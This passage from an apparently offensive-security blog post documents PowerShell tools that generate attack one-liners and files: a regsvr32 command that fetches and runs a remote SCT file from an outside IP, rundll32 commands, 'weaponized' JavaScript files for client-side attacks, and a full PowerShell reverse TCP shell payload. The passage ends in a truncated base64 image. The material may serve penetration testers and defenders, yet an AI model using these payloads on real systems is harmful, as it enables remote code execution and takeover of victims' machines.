<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSHT2ghXZZLsZ7Ti9Wu11MVnTAY3oRp9lP4tkWAgEY8gkeDgGUtYsMiPbDyysBK91HQ2B0PrKnZEuJiUAfDJgCaPBNLMnulQRzCf7_6ow5wQEvRN_7d0Iwn4jlE9iF8rC7ORhQm9rtN50/s1600/regsvr_listener.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="47" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjSHT2ghXZZLsZ7Ti9Wu11MVnTAY3oRp9lP4tkWAgEY8gkeDgGUtYsMiPbDyysBK91HQ2B0PrKnZEuJiUAfDJgCaPBNLMnulQRzCf7_6ow5wQEvRN_7d0Iwn4jlE9iF8rC7ORhQm9rtN50/s400/regsvr_listener.png" width="400" /></a></div>
The above listener provides the following command to be run on the target: </div>
<div style="text-align: justify;">
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: white; color: black;">regsvr32.exe /u /n /s /i:http://54.93.72.226:80/file.sct scrobj.dll
</textarea></pre>
</div>
<div style="text-align: justify;">
As soon as the command is executed on a target, using a client side attack, or any other method:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitK0-GuqxLA_e6sf7rmumcmZgkBGPE9i0JueMORHCW6EOz0UusBJhhEHl2rFgupd_KFZDJO8ZnCu-V5rMtcnsy9ZT1czpuXE5efXwXnwSI7cFFNUEB0O0qYUTCu3spoT4titVEnZLTSr8/s1600/regsvr_shell.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="207" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitK0-GuqxLA_e6sf7rmumcmZgkBGPE9i0JueMORHCW6EOz0UusBJhhEHl2rFgupd_KFZDJO8ZnCu-V5rMtcnsy9ZT1czpuXE5efXwXnwSI7cFFNUEB0O0qYUTCu3spoT4titVEnZLTSr8/s400/regsvr_shell.png" width="400" /></a></div>
Great!<br />
<br /></div>
<div style="text-align: justify;">
This script also shows a window momentarily on the target machine for the same reason as Invoke-JSRatRundll </div>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
</h3>
<h3>
</h3>
<h3>
Out-RundllCommand</h3>
<div style="text-align: justify;">
Use this script to generate rundll32.exe one line commands. The generated command can be used on a target to run PowerShell commands and scripts or a reverse PowerShell session over TCP.<br />
<br />
Here is how to generate a command. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiypSTjF2jYHohjLnMgtfKIQDfdSVpHVlX_dxjtdsfCR5qkNEBXKbfg3V608NSyVGPL-VqK2SiDCe2GcKV1UtJuxXcOtECHF0MJ7Q6hX6VEBPFobDNiwrbDYfvWF9GRplJueUBQQeOCrnk/s1600/Out-Rundll_Payload.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="45" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiypSTjF2jYHohjLnMgtfKIQDfdSVpHVlX_dxjtdsfCR5qkNEBXKbfg3V608NSyVGPL-VqK2SiDCe2GcKV1UtJuxXcOtECHF0MJ7Q6hX6VEBPFobDNiwrbDYfvWF9GRplJueUBQQeOCrnk/s400/Out-Rundll_Payload.png" width="400" /></a></div>
Now, if the rundll32 command is executed on a target using client side attack or other methods, the payload will get executed.<br />
<br />
During testing it was not possible to execute larger scripts (specially the encoded ones due to the increased length). The added advantage with this script is it can be used with a simple netcat listener on a Linux machine as well. There is no need to run a special listener unlike in the above two scripts.</div>
<div style="text-align: justify;">
Start a netcat/Powercat listener. Run Out-RundllCommand with the -Reverse switch: <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMdLiAR7lAL71-XJa16U8ON0n_9ifHAlUdnpfA8X_3NHwvBup7mf8yRl10OGk8dFhxjUNK5QjvNWlGGkpFwj2O9AWBblXHSmSt2zdur2jdS1V6XusRM4-GYMGvw0qX3H-x-w1dW_orNRI/s1600/Out-Rundll_reverse.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="50" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMdLiAR7lAL71-XJa16U8ON0n_9ifHAlUdnpfA8X_3NHwvBup7mf8yRl10OGk8dFhxjUNK5QjvNWlGGkpFwj2O9AWBblXHSmSt2zdur2jdS1V6XusRM4-GYMGvw0qX3H-x-w1dW_orNRI/s400/Out-Rundll_reverse.png" width="400" /></a></div>
When the generated rundll32 command is executed on the target:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZfdbAKe2UpJL40MjJUd-4afR90jhDBooCSqfYaHK-cUUXbRUY_gNH-jGtfTkUygjA1SOGtup6oA3RY6ZAldXuoRqKxLGplmGuLjvfeavOSDiXEif5dsocv11ODJq-ro211mmZDOKaO_E/s1600/rundll_reverse_netcat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="207" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZfdbAKe2UpJL40MjJUd-4afR90jhDBooCSqfYaHK-cUUXbRUY_gNH-jGtfTkUygjA1SOGtup6oA3RY6ZAldXuoRqKxLGplmGuLjvfeavOSDiXEif5dsocv11ODJq-ro211mmZDOKaO_E/s400/rundll_reverse_netcat.png" width="400" /></a></div>
<div style="text-align: justify;">
Nice!</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Also, the execution is silent on the target machine. Please note that this script leaves rundll32.exe running on the target machine.</div>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
</h3>
<h3 style="text-align: justify;">
Out-JS</h3>
<div style="text-align: justify;">
This script is useful for client side attacks. Using this script, we can create "weaponized" JavaScript files which can be sent to a target user to execute PowerShell scripts and commands. Once a user executes the file (a double click opens the file using Windows Script Host, wscript.exe), the specified payload gets executed on the target with the privileges of the current user. The default name of the generated file is Style.js. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNVNTliI0nuhitac1dt7ycrddLvHdM4cGzxiYg3o8akIEt5Cz2aXLBx4CRCGxX6SArQI9391TP89i9Nw7OIIXNiZQJrkZy6BbLP1qKZ_8PbFnFH62mgOwtC8oLgTC8_XPTSTaRPUQJOYs/s1600/Out-JS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="23" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgNVNTliI0nuhitac1dt7ycrddLvHdM4cGzxiYg3o8akIEt5Cz2aXLBx4CRCGxX6SArQI9391TP89i9Nw7OIIXNiZQJrkZy6BbLP1qKZ_8PbFnFH62mgOwtC8oLgTC8_XPTSTaRPUQJOYs/s400/Out-JS.png" width="400" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Once again, it was not possible to execute large scripts, therefore, there is no option of specifying a script path. An example is included in the script to execute a reverse PowerShell session over TCP. </div>
<div style="text-align: justify;">
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: white; color: black;">Out-JS -Payload "`$sm=(New-Object Net.Sockets.TCPClient('192.168.230.154',443)).GetStream();[byte[]]`$bt=0..65535|%{0};while((`$i=`$sm.Read(`$bt, 0, `$bt.Length)) -ne 0){;`$d=(New-Object Text.ASCIIEncoding).GetString(`$bt,0, `$i);`$sb=(iex `$d 2>&1 | Out-String );`$sb2=`$sb + 'PS ' + (pwd).Path + '> ';`$sb=([text.encoding]::ASCII).GetBytes(`$sb2);`$sm.Write(`$sb,0,`$sb.Length);`$sm.Flush()}"
</textarea></pre>
</div>
<div style="text-align: justify;">
</div>
<h3 style="text-align: justify;">
Out-SCT</h3>
<div style="text-align: justify;">
This script generates a SCT file which can be used with regsvr32.exe to execute PowerShell scripts and commands. The default name of the generated file is UpdateCheck.xml. This file needs to be hosted on a web server and the one-liner regsvr is to be executed on the target. Note that, in case a PayloadURL is provided, two connections are made from the target environment. This first one to pull the SCT file and the second one to download the PowerShell script.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAmw6bxlqz3qwBC0geRdofJKts8tw_8QqttBIwZcyNzkvMSltPz1QLRZFl-zUhMbTyJWg2fItRyzIpqs8DDNxv86oMz5tfF3P8pSmRIbyQ0upiNKmJdZR67c3Jkzxj3sWbwyVKvTqfMFQ/s1600/Out-SCT.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="40" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAmw6bxlqz3qwBC0geRdofJKts8tw_8QqttBIwZcyNzkvMSltPz1QLRZFl-zUhMbTyJWg2fItRyzIpqs8DDNxv86oMz5tfF3P8pSmRIbyQ0upiNKmJdZR67c3Jkzxj3sWbwyVKvTqfMFQ/s400/Out-SCT.png" width="400" /></a></div>
</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
Like Out-JS only small scripts can be executed using Out-SCT. An example is included in the help of this script which explains usage of a Reverse PowerShell session over TCP without having to download a script. </div>
<div style="text-align: justify;">
<a href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABTEAAACOCAIAAABmNdupAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAASdEVYdFNvZnR3YXJlAEdyZWVuc2hvdF5VCAUAADk2SURBVHhe7Z1LkiS5ra61B+1Awx71WKYNtPVYWzhmtZCcawu5iTPRUrSLe+9cFwDpTjxJejwyIzP/z8qqPUgQ+AF6eBCVVdF/AQAAAAAAAAAAAAAAAAAAAAAAAMCn8bf//ec//yu//vP7X/vYh/P33//47z//+NenxQcfyl9//8+n3m7gx/Hbr/d///v912/9JQAAAAAAeBQ4aM2hfnve6HJDfvRG+vph/OuP3vDPW+5H9uR/pZgPz+N//nHJ5ytoeAK8S4/4A5xpT76V5p9v/377sz0A+L/PhaM86SlDeWjwLHsWD/uoEEfE82+7Kffck/qmS9NoOb7/6i8rnvK+IHHf4F3w4Vk8ZS++OP0+X5ZluVnf4558Fdq2lM/PvmvM5OHUuHlXFhoaSokz1RoWTgqWWWiDZSGeUQcjoFGl2kyXnxe3o3eC+Kg3Yw/7Ou/9sg6ru+khUPS1c7kXXqdiL8eiJ6fu57//+Ft/QfztH//94/dxfbRfR7d8z0/Ul3868DBY+D/+p794GNf64VfQ8EyeqmTLOb3x+QNCnhJ96Gnwg/C2D94VlAWeXl+Rfvt9Hjffk/LhvVjJt+U735r9dcFz3hdbH/wvz0dn8bxn1BdnZyOWNp96T8beyG80b35HpvzrA+Mpu1vUQk741/uRddRwsv/5ezp5eyvvVlZwlppfODNReI7ZVzvsaBDELp9nHyPrROSSVRYyYkP4GE3EcU+Ondpkow5sspcYS9n4vLgZk+pHQ8X/vOCWjTo8Ve0LleLrMu+Eucf+X9WSy48vTSv5rz+sAfeat7XWH9WTP+UH1MSVLvQVNDyXV+jJ5ekgT4k+9CTsh99DwTPuq7J9XHkOt96TdMOtdTej5TvrWe+L7/Gm+NgsnviM+ursbMTS5iXuSRJRv3eDwtBR0Wv95ueX9g1OLvQKsT98am90fS6UsP36AmU9wwQNKE3JfV66WjFbSHO2eJqFxjU3ZBF208fUm3KNMnSIWUAOyE7c9JEHsyrOc/nc6JodJU9V+zqlyCF9k/ftCvnLu/wz5/Zz6eOH0qYBlu6kjfMv/QPtg9pg/Ezb/lItt+7ATz11Ty5/vdz/8NcIWPT/+SyF2FjePiHWfyhb/YD6KLD8UgZ9/I9/2VT0PtgUxy+3VwOjgftztv/H78fF30axJzv2x+9/7+PMlgaTY9HWqr98TtHJbfewUQcN2ZRtc1XqxvRvv++Xuj8ddj827oDf52cIjse8/Tou/jzHvJBjmJGPLD0vTw9Pf96ZubYoGfI+zMPy1Knkpe+d1PGlNG+mh2ZVWsW++7FK5x7zPQdckZjdQnmFZOuE5pXcFkkoneSAFpalYKd2cqyV8TwXGk1S89BSlkoxpsZGw1nG5Q0z6sHY/bBzA5vqzIPKvIk/jJuL/oqntBfrf+qhM9Ng5wYPyyLC827uvizMTFuTDM08MHtZHEZMctvPQ6yh9bxoRJmUYHAaLQz69PyOEhZpbjBdQ5O2Nlz8Yc6v2i4oWNIwCR70iPZG16crMenXF4ixOka0QKZ11kxcskepwSSYEBbeWATDIgu7m1lV6nQWlAt9zAKy4vWPKEKAnEZ20+yLWZX2k6REKZxkRzWOOGw2amLgOgqtPocW40YLTDK00520Dl1twiKEYGzkw7yrTAUQJglVxkKDj6BWH1WisbNg5KbP7tMDGGFXoPaFeq+z17U/puYeTjVt3K+cf7FcWBpIn1c3umc46RG5Q7ICCArR+iEW6Z0HxE/Rxi1/Tj43OLey3Gym+AG1+8MEbhq5+TzgyP+h4o1acnvs/My6UEOmQRpRGWTPR5MpGTeDNq5bdKdZ2NZAyJ8FmJ7f+2wNsNqurTo0SiWLUg8muczTLJ4Oj/88EPjx4G85eWLIoH7/07XSwDbjsdDs4mNC1qT3c/Z5aKSIS21hIzLs4m2oSg30CLt0KbSATX4zFcnN4AGwt3fyPlQ0EWlNEtja5iRk1evSM8+LQslHhFP4bgO4JS2J/mJPZIyRLmKye5Jwo82qvxBoZF1ZKZK5SMk0cAptsMlv+rUfGddZ8RKfpSyoZG55OHycc3x1GPHUxi0397DW0Nb3F54tD1MNGh4vYt2TRRbORHpEFnaJeNQuNkPM4PDy92q77MxDk9hfZEwNJAIJtXkY+0Wae9Cyek1QaOrMEZO13mZSBBWcVul3dBuWDa4IoctY5MVNxBGDvZ2uUGqQ/OqIYWXpaJ9VFlxcPZ/Z31qIWR3a32zvpB8HstpcPJ47CsxL73xviovFA2SDlsS5WO+gxNQuixDNRX9RUNhshPAm8tra7AggSjMXlCPYe4aLMj2ybiJ1Lu7YBe1Hilmvyz2w66hss7I0EKTtq9qbowMfroqenNyuG3IhVSVMlTALg3aHzKsc5DPpYPvDkOOF74cZGjSr5o3iIA1HVTnCcS17LG6be0uclu33P1zEXQ2NqETJyNiqQyNXsi71YJLLRprHE43+u/OQuBn95DyhsSMo35V93poqmwmzZ5z3EPwHXTRoVpCNeaRZD2lqWhDNH9dlmvci72rvjga3I+QVzD3ktsS8UIkzGlILlpXMA1u/qtoLJjtwOmGb8KhsMniqkwQcvsVarhJSDWd0WXzMK9NsEQ06GXm1GnseWvziw0KmvBMadEO1h5fIQjG5H+7MgmzMaxvpIVn4EJbdEDMkvPaS1Gu2WcLUIERgaFANzdPcxLp0BIU6zfoW0cVM80ggb6t7ckVQe8IijimWzf1QXbraz5pybZuQ4I3EbEwSGzWbMq9GFiLb0HKPF5TRWwVOn1lMFVTcyNXDqeuzRAroVdOgGqIUpt6Di7QQS8RNWqLUXfaU26lDbrMOkSUVxnYEELlZWjZnSiam1reV+oCcM9cccE+edDzEaNc00t+0y6WBMG10jxZq3pPznxr8429ss2iqmef15BvkvVyuSKKN61hL1TALm/3wUoMyOEP4WB3aDdvNbmropB0yb2P/C+Hh1tuqQ+PWUg8muWykebxXNx8St5K7V88JZRAeH/J8OcifCzP57E89wfn5cjopHlU07B5wxsiuyl2IonapDGZpTmDbjCHSZHVwNUSzZVfjMitrMbwoFK1KxGiLXK5Ea5ebIslqkHhslFk0yEn7U/3+WtGnzuUsy7hqA/2F0h/INdDqQ7UyOJM3VR3QsPVVJ7jrQXxUFUynoufKw4tkMagDEfdlwVbqHjDOHpcFORpow/0QM0J9ErfTGjJTgzTBEKVMcxuKU69jEYHDvKgk4Se0myqYbEC/vpFlPTskodbOdpXGDUoNFHD+nKSl+rV9dZWdLNjGxMiKUtZpQVmHgLdshekvZLJf78HLM4KafYUBrlyoSqieEeLNQ3S7fDeLVAkRxDRo+KY6ZDYbIQoTx44AIjfLI4htv442e7LmkItkO0p8C31SNKjDfmnQKMwaZ9NGq5pZ1pOP9ihVy2vPJk9+fVJPztr3ez+JllwP3MKNRrHUsNOT+yr2X2Y3VhookdlyD2+dNtiqQ2N/8JLbxixNfpNmbL/lLsCxso8Z9ZxQT5/p44PsygdSKVwvspZVFQgVxQsyCovQMtwub0jzMiqcotCWcnig/57pFxJLt7NCFfmq0cLtIUxfb4jssGU2zXKSiikkRuqZlvo3CrkbpjbmoTlSachrchaQLwqMXLXWsethJr6YCkErDy+SxQE7m9g8IItzwGb00CxOdLwLIWZY2QS7zSSmm9WZGuQJzpbQ3JUUOrTKLtIhQjidZpJyZ/LnGywyTYG8xXwnm5XkGtTWFKas7noJNaUGycROUXYjWFhIAzdK2c/CBs02tNzjBWUdIjaEFS9u+vWDuaDQk6uaObRZEcG4fjfNyJVM3zg+yEz2QWazEWLH9a5VblasleF+He/h20p9QL51jnukXa6Q/+RU2S8NBOmHivZGd+DyY/DeyWm3Lop7GX94/nk/J6dGLo+8/uEtXcda+p8PzxrFgx0Nys8IQYNBQMJMA2+mnQ1/wJJgirNVh0auZF3qwSSXWZqd451811t2Ab+jU+cqqHrQrB4f2bRannEqYN/mgU4zs1gNH9EqzOWKonapDC6keY0zQ821EK0U4qj/X13aSERlYfHxjIDcm7bI5Uq0ft2d0O9LkYPMrXiYLOvzuRmPmrvIiuSsI7mbVIMSLH79DUOD6TqHWuvZ9NB99GsHTUUn8ZYrPWxqkPXPy6JDFlNfpYddDWcArpBxteuh1pBj76K9EDMkvN6IuNfRxjM1oMmoM4liWExnhHJoVUGhEZBKXIsMTgVadWVDM3LHGZkly75cvUCpgYvlEhTbfh2LdltBLmZBEpRxFF+ms+LCQpO56A/cvS0JN6cmS6OkuIMWOx2ir5bniJt+baCJTW87dUht1iH2ctoRQORmeQSx7dfR5rZSn/fmDe/KSU+eNre6WVkaCPNGN23CDL4hs4Jju/a8nrwVuapy9QNqIm1NJY8H/3vyiQZVFeVHtbukJy+bYaYhFt4nLgXu1wdm1VYdGrmSdakHk1zWpT4fMje+ZQXyMbmj+F1dTKmg6umjHx/2QdPIpKrlKYdP0WLsjgLM8BHtA86+6mhBar5I837IcfzM3MlNwQeiX+2jV3TSdb5xOjnDvFCJHCt7WUliIVLG+vVB9MqBinuSadM9Jkv0ooyBQCNBeSeTREw0KMEqe17Qh2m0iqZQawN7HkrxDE3t3HK1hz0Nsv55WQiTvejcm8XYPgll8nlAFtmUuou2Q8yQGO6e916DjWdqQJPzO0pW9+uDKGKJdiloVfpasGmmtwqNnSZJVRKnAplWG7pL7jiS79XGWrYiZjprDa1YrphDBi20moqCzDTsZaHgBTqqF0Gvr2royModJclmKAoBj2BbYUTy96Jp8BzKZNs8Q/R5HSqyQA0tZ0pQkpDbrEOQxVrFjgAiN0vL5ky9yQ2l5iXJnm9T9+QEdWy6NeF21xovDQiy8V2XsqHuZ94Lhq5bGrsjplvOsZKurmEWZswN+JYR0ntikYcUZrSFvnnmyPb7xrlb9m0hOVENJ0e0Le5Mg2p9yezwbH4Ezctd70p3h2txJxqcMVvSrF4um68131YHQWVhWZR6UHogVqU+36qbz4iU+R3Fs9XbWj0nlAD9+Gi+1SOYJ5Mn8lo/r3t7yx5MHMMtdqKVICE84ETU8OBEKusizfthx/ZrUZuIaU0cnDUhLsRfJVBlYfEpuRz5pXrN8XwQJ9pVkliIbNOLG4aN9CJDrFsccW4zgwGrdAKImQZyd0zJ4uaZo5wreLkLGT3SAjXC80rJlgceSsQLPLVxy0087Gl4bhZMssIz87Cnod3btz6CmIkGttZlsfcnsxdihoTXDswN2ZluFjMz4AjTO0rMtcOQ5hbkxurmwEcUfS2ENDkFNcIvnSRX6qxQDI1fF28JajO4bC4QD3lJmUq2EyZRZhrMBrUXdWGKMtUallnIUmXhXws0OIZ4S5Jcag0DsslmXUzOeealuenXD6ZQuAMvvfO9GaK77d9kVh8W4TLkoWTHl3WobNYh+KUNGUf4JhgDMp8kReO5Tlv6WOrwVrpWatFThF4jfUb4FVq63uW2X1n3vjQ4WrH+y7dB3DONQVZ1auAm71xo+3AaOWJpAeSH/1yAr3tHdbz0v86IS4OTVu/sDpg0fgMTxxnLnwbYPYnxCbNprn8uNXBbe6ziqpz1+/s5dZbcF0N31J2ZBr2cpmRv6fpo+yXNY1B+XayDWat+TWS4EJse5mkSx1u1fPPvMLmj4sOiwxMHXQDDIo6poUvZem9m7iR7+rQIxXPJeznNvM440DEeTpHeukjzfqRQp3/h8oY2RV2PeNLadCqaHibUJQw0tEIejlUwccLNMxfZ6mCkph7CYEetbHkVWTDBNmB3ow8KpQYfr7vgAMfUKUOZCk4foxUkKicezMoTHUJK7ZNUEdYehE/OYrIXwuOyOHylU4/YC33vpBltiUxRClr9/X06MGLjZs0MJAtrYB2IwTLNErPSIYF0ZMkqDHSMJ5s/T739aSP5MgQh3mCF1jXQQoyFVUhUlQiGh5+kzmsNDRUrSVN7qapQadjLwujMQyiTqxqc/5PLGghtdenGXpJXKu5VDWljSVaizkMMTBydglrXlmnLTR069iAs9qlqg1UdqjvKbdkshOD9JBmabLT/WzToUofKhoGfg+6T8q7+1aEmMPxpxhV6L3oX92p4BR5Rh4+hPUjlv095t9LT4Ic9BT4J2ch+Daa8wj35Hd4X3+WWwzPqVcBDDIDXBO9NAD6a+zvJV/DwCnyPLO4Hz/EPA6Xe5BUK9T02C1mAx4K9AOA1wXsTgK8HetEG6gA+GHxkgg8Gtxx4LLijAHhN8N4E4Gth/tV8/s/IfwSoA/hg6ONS4f7ZEQCPB7cceCy4owB4TfDeBAAAAAAA4JlU3ymkwT+4BwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALLFfH/ix3x+ovkflQ+IeX9zyKV/O0gqN74UBAAAAAAAAANChJvUFvsWf2tWPU0Epf2hjfH6D69sbdeXoyQEAAAAAAAAAND60Ga751j354EWqDQAAAAAAAADg+Rw/n2Xe/qSGULei9DLSO8Y+9/7LmvlO1rqw3eb433uO8WGfeCqbVRMlNNMzDR1twuv3e/K+clUHYlrqExov0wQAAAAAAAAA8H3gLnE0hq2ljI1i3SXyzDutsj7qllKacBOAR3xE9hFV1DKc0yahv4jkGtSIrH+/9HNylraoQ4zhVBywL/TkAAAAAAAAAPD9oUZxo/+ru0RpLX1nSYN1Oxt78OCdnWYOchlZU1+YHrgliV6WkGooSO2t371SE3PtAAAAAAAAAAC+EdQrDvI2tO4SuRcNa9Iu+SCZtE7YIP8pdy4jDya2/TpgNZBp4mCWQ2SvDvR6UHrP0wQAAAAAAAAA8M1JW8tZlygz/Xpg7dmpJYSgZvVcUDfDqYxCmxM20VD8CUItI8OF6xTaBFaUB5itAgAAAAAAAADwncl60bpLTDtL1eXypV2bt8Cnn7pVrWTkzbPYtsuVBjJNHORuK1LZeaqDYjpPEwAAAAAAAADA90I1ridZo1h3idyLBnsaPIait6pRpWGK0X7vQ55cRupQmy41KL0HaV59OPsCudRe+6XrrVITYoqeHAAAAAAAAAC+Oa3FVL1i64n7i0HdJfKM/b5x21ZzBNV30hyTdaJdTD7XKGWYkCGLtQZeoAZ4Qfq9612i+6k7w9JmdehL16Um2FeaJgAAAAAAAACAb0Tr/nqTKrgu0cydqF5VPBwdZ8P3k9b9b4fL0PA2yzCcSwhhjFXodTc06BR4PDE5jWIvvayDGMxKbdYOkjIBAAAAAAAAAABM70UfATesrtH+OjywDgAAAAAAAAAAwBaP60VbS95ffDnQkwMAAAAAAAAA+Gge1ouSo6/897TRkwMAAAAAAAAA+Ei4jR7c9NfO4z8W/4Kd7QPqAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAJf/n//3f9stdAwAAAAC8EPJNi/huQgBeDrw3AXgUaMUBAGCB+u71mw8f8v8iW6+1X5GOs84TeMRuLtnc7j2OL///uP8VX78NX+X2+y7n/q/z7r7plvuQd9a9PEIkHuaDh703P/4pd40X3836nuzCv8Pt99FPmA+/J9GTAwBelPP5ez59zafiJ/w/yeqPvTVbaynl7/DJ+TW4ZzeXPN453Rsfe1p9an2+BscjyNaBCtO4uB9Penc/VqTm1lvu0+6c4whtKKTcI3Jr7ZO2+wPQVTxSOO8n4olp3XrLPZ2X3835Pflpb8nn8KHpfOQ9iZ4cAPDC8LP33X0aft7H9j2fBDtrv9kH54vz1Go/3vmH3/a4GwkugnsA0VBrTPrrXZ5XzweKNNx6yz0v0x18dMoiS+MekTtrP7cId1KKf/ZT6PM+3Oe8/m7OFX7puzHyoel85D2JnhwA8MLIs5d+0w/F+Ihkg5Mrj8++kE+u2kflQtRknwRGgLexkwMdJbXxsYyR03j+hKidwg9Ttjr//tWv4+LPYV6lahmRtabxU6nj6G/TyGt1LiLe/qQVexIUCw87IhiyKyZ3PBgbKW1XYRcProrUFrx2RHggZRYEzbGuUe0svHVwi8F8N9VsKNJ5Y6v7maz67MmYM6aZlogU4RflcJpzQm9vPNwHBBWDTF0WpgYHyZ53JzGFg8JgV6TRkeSv53mawnWrPnNqPi0TLzKb3dGEUVAZ3VyHRoxOI1FnKXKq0U4OtP/UxscyRk7dece2BA9Ttjrv3r2H+bRQTGVA49Eb8et9JHKEJUIl1bvslJfJ0GXggDFuUagxrGOnsZROckAL08wqTPwDFfMMGTdLkWdxVun2j2YiVUhoB2TDmkcponfrJuzojL6UK6C9+BizCHrnjvFhn3gqBZooIc2Zho424fWkLFbrSaAnBwC8MPLslef1eHq6RyQ/y9VrfqAmn/01HOKdFg0fzUX+sC4/CQby6RIe4jtrZzZbaTYHpylf9TU81pzzyv5h0+xlfgkvC0mZEJ6sDnaoSSmWFyw8yID2mIjoSPKx2hsevElQUTpvLEO40rE9/yDURLibVRacgv7pa6yDGxGZ5na6aOAVKFhMWk/yoJtPL5IrORaKgEuFbHF5XVvT/LVhMWD2smiu+ouMtpCozCqD5plnt0WKLzW7ccu1KP0Fw0timkSwbLBPs8BJOhA75modGjF6qicdDLiydHbWzmwWe9FoDk5TVW0ea855JSHjYi/zJ336hkrSRA/WTMaL6CodZFjx4r2pBjiQf3O6JWJy5sivtHHH3pYxRrpoRZljp82fwWYaXBYy25w3dc1UHDaDPeYKeXb2MJfQesAbLJEIZkfYZy3J7T5hi9ZgH4kMDpZ6dk6bhP4ikmtQI7L+0gfGnaAnBwC8MPLsbf89n4v6yZ09xusHdgq7Dj5oMHkM7zouPlyWa0ub3TRpiMg+hMjBYcxG3VnqtyAXR6O1g+heybiRuYc0H/2zHUWe0NpDVrQwljtvLEMkRaWheJfewzqLENJOZw5M2ksDgkzKMhncugF5MCpt1CjhYiF73NNrFyzDzYLogwvKFE5E2+wQWRisRS73gq79vARTg9pcSJ0ywVJIrdP3pkS+oQ6NTZ25yEi2emdtabPciw4NFTmSg8OYjbqzQmhdKKYyOPXwxdtb93yxkmQ9eW/SslTuObgsVB7Y+iUfubhr5KEGopxM+kvFMgulkL1027zUE+YKRZ/2Z/2nwYrPzYIQgaHBOomYYsiBnWYOgqGwLHXELUn0soRUw1NATw4AeGHkgcoX/Ozsj1b9FM0ewmrVDvzMDT7Sp3vzu/Epla3eWVva7KaZ5iIoDypKnmbOsOUo43KSVeqexga7wQ2lhyIdGs5EZto3PBQmjrow6xC0NjHYCrvNRhYhBbsmdyCL2uXSoEFmg1JSWU8fRYtMkyRPdZjAEZddvf/6U36nl7dkUaZwN2uRNJSIGgZ0lczbVUF/Wl4mWBKFMQ0/uig++lEORyYyIxO+s7a0yQsh5v26QSN5ebUHFaXcjls4nbX96a9kt5qBYjtTo5BWJWq1hV/eUIUa/rhW49KpIatB4nGHMscOC8hdL7NQBirK5d2cKwyz2n8Ri4anOVvSCkyzSCatEzZI7jciTzYPJrb9OmA1kGniYJbDo0FPDgB4YdTz9Hxcq0dk/mieP4U9uXHquQhH0IzDP8XrtYPKphiX4X7diCMHedGmH5mewzn990zQr+9ziql7Nt+On2I8cDoFSRTJx1V1w0O2LFJbLUMUm5KP3spGFsHECCscyPC4mhkk0GSRZOEtlkWLTCtZlLdgxKVl7W9/nsN8kVFkUaZwN0uRRejTYOuWC07KSmbh2Lhgfze2oOiGouhFTQjvICqs1w4qm2Jchvt1I44cqLorb9du7BXkmJwdPum/HCaXpDRYvCCtsFCrRgu3WsNxTf89tyn3e8CWk+mSQsyJVmUoFir7POXLuzlXGGb9XhTsS1AZKWxceuUI/knKuaAuQZpsOhiETTSs78mng54cAPDCmOcpP03p4agfkfnj0j2F53SvlvzpLH7DQ18+0cx4tjpfayltdtOMIwfKg4pSfAgV0EIypt/lXwn267F8rw6eSwpSbGr7zlQdBmsPezVLnTeWIXKD+wul2cgipGDX5A5kUbtcGqQUuoKYA2+vRaZJkqc0Qo6KywuPlbdkUaZwN2uReVWHAV0l83aVitIo76FgyeQhnkAaPZKbcU52PMtyJ0Rps9qLgzhyoDyoKOV23ERzfLp0Lw1Kg8Wbm/W0KvGlLSbR+nV3Qr/nH0kpudsFEnWy40aVYZmFMlBRLu/mXGGY3diLa5CP6ERF4UurIU/x9JM67IR0hLxkYtsuVxrINHGQu30O6MkBAC+Mep4S/AB9N18OnT7W8wd2BVnHZ3/+cM4dRwmZqh1Rpc1umjLUry3KgVqX+q3hH5b0r3cWJ3Stwq3rkMm7pmDlgea3vak6KNYeyGIdJHfeWIZIDDhoPpiM78BrlypsCnY7l/fk+qaVF/36oLgfgpgDb2+jRm/k6ErBirha+W4WZQontIoJ3k4Kg7XI5V7QtZ+nIVOpECV1ygRLIQlRcGsdGnn0QG4WU8qy3AlR2qzfFw0Z6tcW5UCty/zSUF0opjQQb9Tn6kBvb+lfZi4z9YKsQlrm5dKQuuV2CjX/